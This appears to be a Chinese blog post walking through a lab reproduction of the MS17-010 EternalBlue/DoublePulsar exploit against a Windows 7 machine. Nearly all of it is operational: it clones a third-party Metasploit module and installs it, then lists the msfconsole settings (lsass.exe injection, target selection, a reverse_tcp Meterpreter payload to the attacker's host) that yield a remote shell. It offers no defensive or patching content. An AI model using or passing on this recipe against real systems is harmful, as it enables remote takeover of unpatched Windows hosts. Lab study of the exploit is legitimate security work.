方程式-ms17-010复现

2017-05-16 22:28:33

0x01 环境介绍:

目标机win7 x86: 192.168.1.120

控制机Kail: 192.168.1.99

0x02 环境准备

利用模块:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
wine可以在linux下运行windows程序

1
2
apt-get install wine 
wine cmd.exe  打开cmd.exe,exit退出

将链接的文件克隆到kali中,并将eternalblue_doublepulsar.rb移动至metasploit的exploit/windows/smb文件夹中,具体路径为/usr/share/metasploit-framework/modules/exploits/windows/smb

1
2
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
cp Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

0x03 利用过程

设置参数,按照实际情况设置,DOUBLEPULSARPATH和ETERNALBLUEPATH指向从github下载的deps文件夹即可,里面包含了DOUBLEPULSAR和ETERNALBLUE所需的dll
设置一个payload
注意:如果靶机为64位,改为set payload windows/x64/meterpreter/reverse_tcp

然后打开msfconsole

1
2
3
4
5
6
7
8
9
10
11
12
13

use exploit/windows/smb/eternalblue_doublepulsar
#set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
#set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set processinject lsass.exe
#set TARGETARCHITECTURE  x64
set rhost 192.168.1.120
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.99
show targets 
set target 9
options 
run

最后在msf下可以看到成功反弹shell:

1
2
meterpreter>sysinfo
meterpreter>shell

ref
smb(ms17-010)远程命令执行之msf
ms17-010
方程式利用-不需Fuzzbunch完美入侵windows
方程式ETERNALBLUE 之fb.py的复现